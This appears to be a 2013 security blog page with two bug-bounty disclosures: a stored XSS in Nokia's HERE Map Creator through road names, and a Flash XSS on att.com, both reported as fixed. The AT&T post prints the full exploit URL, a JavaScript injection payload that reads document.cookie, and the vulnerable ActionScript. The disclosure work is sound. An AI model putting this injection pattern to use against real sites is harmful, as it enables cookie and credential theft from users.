Skip to main content

Posts

Showing posts from October, 2013

Dangerous Persistent XSS at Here.com [FIX]

Here.com, is a Nokia business unit that brings together Nokia's mapping and location assets under one brand. The technology of Here is based on a cloud-computing model, in which location data and services are stored on remote servers so that users have access to it regardless of which device they use.

 HERE Map Creator is a service launched by Nokia in November 2012 to allow users to map their neighborhood.

With this bug I could SAVE a Road name with a payload on the map. Any user that try on re-edit the street name will get this XSS.
I report a similar bug to Waza.com a few months ago





Nokia Reponse:



Thanks to Nokia for starting this bug bounty program.

FLASH XSS AT ATT.COM [FIX]

I found a Flash XSS at AT&T main domain where an attacker could stealing credentials of users.

Vuln URL:
http://www.att.com/media/en_US/scripts/JSAM/JSAM_VideoPlayer.swf?completeHandler=JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}//&source=https://www.wireless.att.com/home/video_progressive/video_marquees/B2CNDA-24-emerald-hp-marquee-bkd.mp4
Payload: JSAM.flashCompleteHandler);}catch(e) {alert(document.cookie);}//

Flash Vuln Code:
public function videoPlayer_completeHandler(_arg1:VideoEvent):void{ if (ExternalInterface.available){ ExternalInterface.call(completeHandler, ExternalInterface.objectID); } else { trace("JSAM_VideoPlayer cannot call completeHandler because ExternalInterface is not available."); }; }
Proof:

After 2 months AT&T Response:



I hope to be on the top 10 Award :)